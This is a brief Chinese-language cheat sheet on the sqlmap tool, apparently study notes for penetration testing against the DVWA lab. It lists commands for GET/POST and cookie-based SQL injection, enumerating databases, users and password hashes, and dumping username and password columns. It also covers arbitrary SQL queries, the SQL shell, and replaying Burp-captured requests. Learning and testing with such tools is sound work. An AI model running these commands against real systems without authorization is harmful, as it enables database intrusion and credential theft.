sqlmap简单使用

先安装python，再将sqlmap的解压文件复制到python根目录中
windows下 sqlmap主要命令
python sqlmap.py -h                //查看帮助信息
python sqlmap.py -u "url"            //get注入
python sqlmap.py -u "url" --data "表单数据"     //post注入，data直接复制bp里面的数据
python sqlmap.py -u "url" --cookie="session=123132;name1=234"    //修改请求cookie
python sqlmap.py -u "url" --dbs        //列出所有数据库名
python sqlmap.py -u "url" --users        //列用户
python sqlmap.py -u "url" --passwords        //
python sqlmap.py -u "url" --tables -D DB_NAME    //列DB_NAME的表
python sqlmap.py -u "url" --columns -T TB_NAME -D DB_NAME //读取TB_NAME中的列

--current-user检索DBMS当前用户
--current-db检索DBMS当前数据库
--hostname检索DBMS服务器主机名
--is-dba探测DBMS当前用户是不是DBA权限（最高权限）
-–users枚举DBMS用户 获得数据库的所有用户
--passwords枚举DBMS用户密码hashes值 获得数据库用户的密码的hashes值
-–privileges枚举DBMS用户权限 -可见root用户的权限最高，执行的操作最多。
-–roles枚举DBMS用户角色
--dbs枚举DBMS数据库 获得当前可用的数据库
--tables枚举DBMS所有数据库表 直接得到所有不同数据库下面的表
--columns枚举DBMS所有数据库表的列
–-schema枚举数据库模式 就是ID int()
--count检索表的项数目
--dump转出数据库表的映射表项目

-D 指定数据库
格式:
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa --tables
获得指定数据库所有表信息

-T指定表
格式：
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users --columns
获得指定数据库和表中的所有列名字信息

-C指定列获得信息
格式：
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users --dump
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users -C username,password --dump
获得指定数据库指定表指定列名数据

-X枚举DBMS数据库列的时候排除某个列
格式:
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users -X password --dump
除了password都出来了

--sql-query=QUERY执行sql语句
格式：
python sqlmap.py -u "url" --cookie "cookie数据" --sql-query="select * from users;"
执行了一个说起来查询语句，并且获得了信息。

--sql-shell提供一个交互式界面
python sqlmap.py -u "url" --cookie "cookie数据" --sql-shell

如果对懒得对命令行构造参数，可以通过将POST请求保存成文件，sqlmap支持从文件读取POST请求来进行注入测试。
文件方式对单个POST注入：
通过burp suite工具拦截到请求中将POST保存成文件
使用-r参数读取POST进行测试
sqlmap.py -r C:\Users\l00109379\Desktop\抽验\sqlmap\opr.txt -v 3
-r参数就是用于指定具体的待测试的文件。